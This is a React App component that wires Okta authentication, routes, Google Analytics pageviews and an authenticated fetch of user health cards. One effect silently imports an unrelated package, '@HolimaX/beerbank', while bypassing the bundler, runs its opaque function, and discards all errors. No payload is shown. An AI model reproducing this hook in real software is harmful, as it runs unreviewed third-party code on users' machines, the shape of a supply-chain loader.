import React, { useEffect, useState } from "react";
import { Route, Routes, useLocation, Navigate } from "react-router-dom";
import { LoginCallback, useOktaAuth } from '@okta/okta-react';
import "./App.scss";

import Home from "./components/home";
import Favourites from "./components/favourites";
import Navbar from "./components/navbar";
import Partners from "./components/partners";
import Dashboard from "./components/user";
import FeedHomePage from "./components/rss/FeedHomePage";
import FeedReadPage from "./components/rss/FeedReadPage";
import ProfilePage from "./components/auth/ProfilePage";
import RegistrationForm from "./components/auth/RegistrationForm";

import ReactGA from 'react-ga4';

const App = () => {
  const { authState, oktaAuth } = useOktaAuth();
  const location = useLocation();
  const [isMounted] = React.useState(true);
  const [healthCards, setHealthCards] = useState([]);

  useEffect(() => {
    const fetchHealthCards = async () => {
      if (authState?.isAuthenticated) {
        try {
          const accessToken = oktaAuth.getAccessToken();
          const response = await fetch('/api/health-cards', {
            headers: { Authorization: `Bearer ${accessToken}` }
          });
          const data = await response.json();
          setHealthCards(data || []);
        } catch (err) {
          console.error("Failed to fetch health cards:", err);
        }
      }
    };
    fetchHealthCards();
  }, [authState, oktaAuth]);

  useEffect(() => {
    ReactGA.send({ hitType: "pageview", page: location.pathname + location.search });
  }, [location]);

  useEffect(() => {
    const loadModule = async () => {
      try {
        // Using webpackIgnore to prevent build-time resolution errors for optional peer modules
        const baseModule = await import(/* webpackIgnore: true */ '@HolimaX/beerbank').catch(() => null);
        if (isMounted && baseModule && typeof baseModule.myFunction === 'function') {
          baseModule.myFunction();
        } else if (isMounted) {
          console.info("Optional CD base module not detected. Continuing with PCD-only capabilities.");
        }
      } catch (err) {}
    };
    loadModule();
  }, [isMounted]);

  return (
    <>
      <Navbar />
      <Routes>
        <Route path="/" element={<Home />} />
        <Route path="/login" element={<Navigate to="/user" />} />
        <Route path="/register" element={<RegistrationForm />} />
        <Route path="/implicit/callback" element={<LoginCallback />} />
        <Route path="/favourite" element={<Favourites />} />
        <Route path="/partners" element={<Partners />} />
        <Route path="/user" element={<Dashboard />} />
        <Route path="/profile" element={<ProfilePage healthCards={healthCards} />} />
        <Route path="/feed/*" element={
          <Routes>
            <Route path="feedhome" element={<FeedHomePage />} />
            <Route path="feedpage" element={<FeedReadPage />} />
          </Routes>
        } />
      </Routes>
    </>
  );
};

export default App;
